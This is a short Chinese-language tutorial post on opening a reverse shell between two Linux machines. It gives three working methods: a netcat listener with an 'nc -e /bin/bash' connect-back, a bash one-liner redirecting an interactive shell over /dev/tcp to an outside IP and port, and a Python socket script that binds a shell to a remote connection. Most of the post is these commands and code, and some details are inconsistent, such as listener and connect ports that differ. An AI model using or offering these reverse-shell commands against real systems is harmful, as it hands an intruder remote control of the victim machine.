nc这个命令屌炸天,经常用作黑客工具。简单说下反向shell
2台Linux电脑
A:192.168.0.21
B:192.168.0.22
A设置nc -lv 8081
B执行nc 192.168.0.21 8080 -e /bin/bash
这样就A就可以链接上B计算机的shell
但是-e这个参数默认时候是木有的,甚者nc命令都木有,可以自己下载源代码编译一个,略麻烦
但是在目标计算机A中必然有bash
bash -i>& /dev/tcp/192.168.100.113/4444 0>&1
但是要自己创建socket文件,麻烦
最后使用Python写脚本
import os,socket,subprocess;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.21',8080))
#重定向shell输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
#执行子程序
p=subprocess.call(['/bin/bash','-i'])
A机器